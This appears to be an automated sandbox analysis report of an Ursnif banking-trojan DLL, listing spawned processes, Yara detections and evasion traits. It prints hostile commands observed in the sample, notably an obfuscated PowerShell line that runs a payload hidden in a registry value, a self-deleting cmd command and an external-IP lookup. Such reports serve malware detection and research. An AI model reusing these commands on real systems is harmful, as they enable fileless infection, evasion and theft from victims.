                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user~1\AppData\Local\Temp\5771.bi1"
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wufxrouxe -value gp; new-alias -name atvqcmfj -value iex; atvqcmfj ([System.Text.Encoding]::ASCII.GetString((wufxrouxe "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESD841.tmp" "c:\Users\user\AppData\Local\Temp\pkbugtxo\CSC26C720E9EBC041F086604EECC7DD3CDD.TMP"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESED31.tmp" "c:\Users\user\AppData\Local\Temp\lboh4mlq\CSC3DF21D054A9F4C66BF1FA9CD771B1F79.TMP"
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220422Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8D1.tmpJump to behavior
                      Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@28/29@0/2
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE6DB6 CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,3_2_04DE6DB6
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\HxEWwh74qT.dll",#1
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7080
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{5840C7B2-D747-4A43-210C-FB1EE5005F32}
                      Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{08B24B58-C72D-7A90-91BC-EB4E55B04F62}
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: HxEWwh74qT.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ntdll.pdb source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: d:\in\the\town\where\ahung.pdb source: loaddll32.exe, 00000000.00000000.390436792.0000000000480000.00000002.00000001.01000000.00000003.sdmp, HxEWwh74qT.dll
                      Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000003.00000003.515144273.0000000006160000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.500269242.00000000060B0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DEB2FF push esi; retf 3_2_04DEB301
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE820B push ecx; ret 3_2_04DE821B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04DE7E20 push ecx; ret 3_2_04DE7E29
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_000002DC008253C8 push FFFFFFD3h; iretd 20_2_000002DC008253CA
                      Source: HxEWwh74qT.dllStatic PE information: real checksum: 0x872fe521 should be: 0xa724b
                      Source: pkbugtxo.dll.24.drStatic PE information: real checksum: 0x0 should be: 0x97df
                      Source: lboh4mlq.dll.27.drStatic PE information: real checksum: 0x0 should be: 0x10db8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.cmdlineJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.cmdlineJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\lboh4mlq\lboh4mlq.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pkbugtxo\pkbugtxo.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391081269.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.439315042.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.436001223.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438329210.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391236122.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390852806.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390783473.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390963737.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391015018.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.390663420.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.391212771.00000000054A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7148, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6932, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 6020, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4de0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5456940.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53aa4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4c794a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54294a0.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.438131198.00000000053AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.517494573.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.515954749.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001D.00000000.516723035.0000000000500000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.438206007.0000000005429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Self deletion via cmd delete
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\HxEWwh74qT.dll
                      Source: C:\Windows\SysWOW64\rundll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
